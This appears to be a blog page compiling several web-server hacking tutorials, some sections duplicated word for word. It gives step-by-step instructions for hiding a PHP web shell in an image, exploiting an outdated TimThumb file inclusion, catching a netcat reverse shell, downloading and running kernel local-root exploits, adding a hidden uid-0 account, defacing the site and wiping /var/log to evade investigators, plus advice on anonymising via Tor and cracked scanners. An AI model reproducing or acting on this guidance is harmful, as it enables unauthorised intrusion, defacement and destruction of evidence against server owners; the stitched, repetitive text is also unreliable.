How to Hack a Server [Shell Uploading, Rooting, Defacing, Covering your Tracks]
Tutorial on Web Hacking by Akatzbreaker
Web-Hacking is a huge topic that I could easily discuss for hours.
When I had the idea to expand our Blog’s topics (not only Apple, iPhone, iPad, little tips on Mac and Windows etc….) and add more hacking information, tutorials etc….
So, today I decided to make a good start by creating this post-tutorial: How to Hack a Server
Everything you need to know….
Tools you need:
- Backtrack (Backtrack Website)
- Firefox (get it from here….) – Included in Backtrack and Ubuntu
- Netcat (Included in Backtrack) — If you are on other linux enviroments get it from here….
- iCon2PHP (Get it from here….)
- A good shell (iCon2PHP Archive includes three great shells)
- A good VPN or Tor (More explanation below…..)
- Acunentix Web Vulnerability Scanner (Search for a cracked version at Hackforums.net)
About the Tools:
Backtrack
– Backtrack is a Linux distribution based on Ubuntu. It includes everything you need to become a good hacker. Apart from this, hacking behind a Linux system is better than a Windows one since most Websites are on Linux Servers.
(Just a little tip: To wirelessly connect to a network use the Wicd Network Manager, located under the Applications->Internet)
Firefox
– Firefox is the best browser for hacking. You can easily configure a proxy and you can download millions of add-ons among which you can find some for Hacking. Find more about “Hacky” addons for Firefox Here….
Netcat
– Netcat is a powerful networking tool. You will need this to root the server….
iCon2PHP & Good Shells
– iCon2PHP is a tool I created and you will use it if you upload the image to an Image Uploader at a Forum or Image Hosting Service. iCon2PHP Archive contains some of the top shells available.
Good VPN or TOR (Proxies are good too…)
– While hacking you need to be anonymous so as not to find you (even if you forget to delete the logs….). A VPN stands for Virtual Private Network and what it does is: hiding your IP, encrypting the data you send and receive to and from the Internet. A good VPN solution for Windows Maschines is ProXPN. However, with VPN connections (especially when you are under a free VPN connection) your connection speen is really slow. So, I wouldn’t recommend VPN except if you pay and get a paid account.
What I would recommend is Tor. Tor can be used from its bundle: Vidalia, which is a great tool for Windows, Mac and Linux that uses Proxies all over its network around the world so as to keep you anonymous and changing these Proxies every 5-10 minutes. I believe it is among the best solutions to keep you anonymous if you don’t want to pay for a Paid VPN account
Apart from Tor, simple Proxies are good but I wouldn’t recommend them as much as I would for Tor.
— If I listed the above options according to their reliability :
1. Paid VPN Account at ProXPN
2. Tor
3. Free VPN Account at ProXPN
4. Proxy Connection
Acunetix Web Vulnerability Scanner
– Acunetix is (maybe the best) Vulnerability Scanner. It scans for open ports, vulnerabilities, directory listing. During the scan it lists the vulnerabilities and says how a hacker can exploit it and how to patch it. It also shows if it is a small or big vulnerability.
The Consultant Edition (For unlimited websites) costs about 3000-7000$.
____________________________________________________________
Starting the Main Tutorial:
So, here is the route we will follow:
Find a Vulnerable Website –> Upload a c100 Shell (Hidden in an Image with iCon2PHP) –> Rooting the Server –> Defacing the Website –> Covering your Tracks
- – - Before we begin – - -
-Boot to Backtrack
-Connect to your VPN or to Tor.
-It would be good to read a complete guide to stay anonymous while hacking here…
-Open Firefox.
1. Finding a Vulnerable Website and Information about it:
Crack Acunetix (find tutorial at Hackforums.net). Open and scan the website (use the standard profile – don’t modify anything except if you know what you are doing). For this tutorial our website will be:http://www.site.com (not very innovative, I know….)
Let’s say we find a vulnerability where we can upload a remote file (our shell) and have access to the website’s files.
The Warning should be something like this. It can mention other information or be a completely other warning (like for SQL Injection – I will post a Tutorial on this also…), too! (Depends on the Vulnerability) What we need at this tutorial is that we can exploit the ‘File Inclusion Attack’ and Have access to the Website’s Files. (This is not the warning we need for this tutorial, but it is related to what we do too.)
OK. Now, we have the site and the path that the vulnerability is. In our example let’s say it is here:
The above vulnerability affects WordPress blogs that have installed certain plugins or themes and haven’t updated to the latest version of TimThumb, which is a image-editing service on websites.
OK. Acunetix should also mention the OS of the Server. Assuming that ours is a Unix/Linux system (so as to show you how to root it).
For now, we don’t need anything more from Acunetix.
2. Uploading the shell:
Till now, we know:
-The website’s blog has a huge vulnerability at TimThumb.
-It is hosted on a Unix System.
Next, because of the fact that the Vulnerability is located at an outdated TimThumb version, and timthumb is a service to edit images, we need to upload the shell instead of the image.
Thus, download any image (I would recommend a small one) from Google Images. We don’t care what it shows.
Generate Output with iCon2PHP
Copy your Image and your Shell to the Folder that iCon2PHP is located.
Run the Program and follow the in-program instructions to build the ‘finalImage.php’.
To avoid any errors while uploading rename the ‘finalImage.php’ to ‘image.php;.png’ (instead of png, type the image format your image was – jpeg,jpg,gif….) This is the exactly same file but it confuses the uploader and thinks that it actually is an image.
iCon2PHP Terminal Output:[...]Enter the Path of your Image: image.pngPlease enter the path to the PHP: GnYshell.phpEntered!Valid Files![...]File: ‘finalImage.php’ has been successfully created at the Current Directory…
Upload Output to a Server:
Next, upload your ‘image.php;.png’ at a free server. (000webhost, 0fees etc….)
Go to the vulnerability and type at the URL:
http://www.site.com/blog/wp-content/themes/theme_name/thumb.php?src=http://flickr.com.domain.0fees.net/image.php;.png
It would be better to create a subdomain like “flickr.com” (or other big image-hosting service) because sometimes it doesn’t accept images from other websites.
Website…. Shelled!
OK. Your website is shelled. This means that you should now have your shell uploaded and ready to root the server.
You could easily deface the website now but it would be better if you first rooted the server, so as to cover your tracks quickly.
3. Root the Server:
Now that you have shelled your website we can start the proccess to root the server.
What is rooting when it comes for Server Hacking?—> Rooting a server is the proccedure when the hacker acquires root priviliges at the whole server. If you don’t understand this yet, I reasure you that by the end of the section “Rooting a server” you will have understood exactly what it is…
Let’s procceed to rooting….
Connect via netcat:
1. Open a port at your router. For this tutorial I will be using 402. (Search Google on how to port forward. It is easier than it seems….)
2. Open Terminal.
3. Type:
netcat
4. Now type:
-l -n -v -p 402
5.It should have an output like this:
listening on [any] 402 port
6. Now, go to the Back-Connection function at the Shell.
7. Complete with the following:
Host:YouIPAddress Port: 402 (or the port you forwarded….)
8. Hit connect and… Voila! Connected to the server!
Downloading and Executing the Kernel exploit:
1. Now, if you type:
whoami
you will see that you are not root yet…
2. To do so we have to download a kernel exploit. The kernel version is mentioned at your shell. Find kernel exploits here….
3. Download it to your HDD and then upload it to the server via the Shell. Unzip first, if zipped….
4. Now do the following exploit preparations:
– The most usual types of exploits:+++ Perl (.pl extension)+++ C (.c extension)(( If the program is in C you have first to compile it by typing: gcc exploit.c -o exploit ))– Change the permissions of the exploit:chmod 777 exploit
5. Execute the exploit. Type:
./exploit
6. Root permissions acquired! Type this to ensure:
id
or
whoami
7. Add a new root user:
adduser -u 0 -o -g 0 -G 1,2,3,4,6,10 -M root1where root1 is your desired username
8. Change the password of the new root user:
passwd root1
SUCCESSFULLY ROOTED!
4. Deface the Website:
What is defacing?Defacing is the proccedure when the hacker uploads his own inbox webpage to alter the homepage of a site. In this way, he can boost his reputation or parse a message to the people or the company (which owns the website…).
Since you got the website shelled, you just create a nice hacky page in html and upload it via the Shell as inbox.html (Delete or rename the website’s one…)
5. Cover your tracks:
Till now you were under the anonymity of Tor or ProXPN. You were very safe. However, in order to ensure that it will be impossible for the admin to locate you we have to delete logs.
First of all, Unix based-Maschines have some logs that you have better to either edit or delete.
Common Linux log files name and their usage:
/var/log/message: General message and system related stuff/var/log/auth.log: Authenication logs/var/log/kern.log: Kernel logs/var/log/cron.log: Crond logs (cron job)/var/log/maillog: Mail server logs/var/log/qmail/ : Qmail log directory (more files inside this directory)/var/log/httpd/: Apache access and error logs directory/var/log/lighttpd: Lighttpd access and error logs directory/var/log/boot.log : System boot log/var/log/mysqld.log: MySQL database server log file/var/log/secure: Authentication log/var/log/utmp or /var/log/wtmp : Login records file/var/log/yum.log: Yum log files
In short /var/log is the location where you should find all Linux logs file.
To delete all of them by once type:
su root1rm -rf /var/logmkdir /var/log
End of this Tutorial:
Server Rooting Tutorial
Hello guys, hope you all are doing great. today i will explain how to root a Linux server with a localroot.What is rooting?
Rooting is the process of exploiting the kernel to gain administrator(root) rights on servers.
Requirements:
Basic Unix/Linux Command Knowledge
Shell Acess On Targeted Server
PHP WebShell With Backconnect Option (Click Here to Download WSO 2.5 webshell)
A Localroot Exploit (Click Here to download localroot collection)
Netcat (Click Here to download)
Lets Get Started....
[#] BackconnectingFirst of all you will need an open port on your router inorder to backconnect. Information on port forwarding can be found HERE
Lets assume thats you have an open port. Open your command prompt/terminal cd to the netcat path and type:
where 1337 is the open port on your router. And it should be saying:
Now go to your webshell and navigate to "BackConnect Option".
The backconnect option is located under Network in the provided WSO webshell.
Enter your open port and click "Connect".
Now navigate back to your command prompt if it says sh: no job control in this shellwe have sucessfully backconnected to the server. Next step is to find an exploit for it
[#] Choosing Localroot ExploitWe will need a localroot exactly matching the kernel and year its build. The older the kernel the better the chances of finding an exploit and rooting it. To check which version of kernel its using Execute the following:
it will give you something like:
Now choose a localroot matching the kernel and year from the localroot collection which i provided or if you cant find it in the collection just google the kernel version
[#] Executing Localroot ExploitUpload the localroot via webshell or if you have uploaded somewhere you can use the following command to download it to the server.
Now If your exploit is with a .c extension you will have to compile it. otherwise just skip to next step. For compiling:
If you get permission denied error compile it locally or in other box and upload it to server.
Giving full permission to the file:
Finally executing the exploit:
Now to check if you have got root execute the following:
If its says root you have successfully rooted the server. Next is to add a new user with root privilages
[#] Adding New UserThe following command adds a new user on server named "r00t" you can change this to whatever you like.
Now give a password for the user r00t type:
Ewnter a password, confirm it and it should be saying
Now you will be able to login via putty or any ssh client.
[#] Clearing LogsNow time for clearing our logs execute the following:
Thats All Guys!
Note:- Rooting a box you don't own is illegal this information is for educational purpose only.
Stay safe and gud luck!
Rooting is the process of exploiting the kernel to gain administrator(root) rights on servers.
Requirements:
Lets Get Started....
[#] BackconnectingFirst of all you will need an open port on your router inorder to backconnect. Information on port forwarding can be found HERE
Lets assume thats you have an open port. Open your command prompt/terminal cd to the netcat path and type:
where 1337 is the open port on your router. And it should be saying:
Now go to your webshell and navigate to "BackConnect Option".
The backconnect option is located under Network in the provided WSO webshell.
Enter your open port and click "Connect".
Now navigate back to your command prompt if it says sh: no job control in this shellwe have sucessfully backconnected to the server. Next step is to find an exploit for it
[#] Choosing Localroot ExploitWe will need a localroot exactly matching the kernel and year its build. The older the kernel the better the chances of finding an exploit and rooting it. To check which version of kernel its using Execute the following:
it will give you something like:
Now choose a localroot matching the kernel and year from the localroot collection which i provided or if you cant find it in the collection just google the kernel version
[#] Executing Localroot ExploitUpload the localroot via webshell or if you have uploaded somewhere you can use the following command to download it to the server.
Now If your exploit is with a .c extension you will have to compile it. otherwise just skip to next step. For compiling:
If you get permission denied error compile it locally or in other box and upload it to server.
Giving full permission to the file:
Finally executing the exploit:
Now to check if you have got root execute the following:
If its says root you have successfully rooted the server. Next is to add a new user with root privilages
[#] Adding New UserThe following command adds a new user on server named "r00t" you can change this to whatever you like.
Now give a password for the user r00t type:
Ewnter a password, confirm it and it should be saying
Now you will be able to login via putty or any ssh client.
[#] Clearing LogsNow time for clearing our logs execute the following:
Thats All Guys!
Note:- Rooting a box you don't own is illegal this information is for educational purpose only.
Stay safe and gud luck!
 |
What is Root?
Root is the Administrator of all server. If someone got root access he can do anything with server like delete and copy anything on server ; can deface all the home pages (massive deface ).
We can't talk about root on windows. That enough for beginner because if I talk about the root I need another book. So, I guess now we know the importance of root access and why we try to got root.
How to get Root?
There are 3 ways to get ROOT on server :
1 – With local Root.
2 – With SQL by reading same important files on it root password.
3 – With exploit on software (Buffer Overflow).
In this post, we will explain local Root. I will explain the other ways soon in some other post.
OK, let's back to work.
Go to EXECUTE on your shell and write "uname -a". You will get the same result, by the way.
Now how to find the local root.
You can use various websites like Exploit-db, packetstormsecurity, vfocus, injector, etc who provides these local roots. One more thing to notice is, that there exists two types of local roots :
1. Local.C : which are not ready.
2. Local : ready to use.
How to get Root access?
First you need a shell with a Back Connect option like this :
Enter your "Public IP Address" in SERVER, port you want to connect on and leave it Perl this time, and Finally connect.
So now you must receive the back connect with a Tool named netcat u can download it from the
net. After that open your terminal if you are under linux or CMD if you are under Windows. I will explain only Linux, and for Windows, its all the same.
After that Follow the steps :
1- Press nc -vlp 433
2- Wget [the link of the local-Root.zip]
3 - unzip local-Root.zip
4 - chmod 777 local.c
5 - now to change the local-root from local.c > local
gcc local.c -o local Then you will find local.c transformed to local
6 - chmod 777 local
7 - ./local to local root work
8 – su
then see your id uid=0(root) gid=0(root) groups=0(root)
Getting UID=0 means, u had got root priviledges and hence can do variety of stuff on the remote server say Mass deface, dump database, redirect sites, change content, etc etc.
Root is the Administrator of all server. If someone got root access he can do anything with server like delete and copy anything on server ; can deface all the home pages (massive deface ).
We can't talk about root on windows. That enough for beginner because if I talk about the root I need another book. So, I guess now we know the importance of root access and why we try to got root.
How to get Root?
There are 3 ways to get ROOT on server :
1 – With local Root.
2 – With SQL by reading same important files on it root password.
3 – With exploit on software (Buffer Overflow).
In this post, we will explain local Root. I will explain the other ways soon in some other post.
OK, let's back to work.
After Uploading your shell on server and getting the localroot you will do a back connect and run the localroot to Get root . This is a small idea how it work in the next step you will see how to
find localroot and run it to get root access .
How to Search Local root?
First of all we you need to know what version of Kernel.
You can know that from your shell, for example this version is 2.6.18 - 2012
Now how to find the local root.
You can use various websites like Exploit-db, packetstormsecurity, vfocus, injector, etc who provides these local roots. One more thing to notice is, that there exists two types of local roots :
1. Local.C : which are not ready.
2. Local : ready to use.
How to get Root access?
First you need a shell with a Back Connect option like this :
Enter your "Public IP Address" in SERVER, port you want to connect on and leave it Perl this time, and Finally connect.
So now you must receive the back connect with a Tool named netcat u can download it from the
net. After that open your terminal if you are under linux or CMD if you are under Windows. I will explain only Linux, and for Windows, its all the same.
After that Follow the steps :
1- Press nc -vlp 433
2- Wget [the link of the local-Root.zip]
3 - unzip local-Root.zip
4 - chmod 777 local.c
5 - now to change the local-root from local.c > local
gcc local.c -o local Then you will find local.c transformed to local
6 - chmod 777 local
7 - ./local to local root work
8 – su
then see your id uid=0(root) gid=0(root) groups=0(root)
Getting UID=0 means, u had got root priviledges and hence can do variety of stuff on the remote server say Mass deface, dump database, redirect sites, change content, etc etc.
No comments:
Post a Comment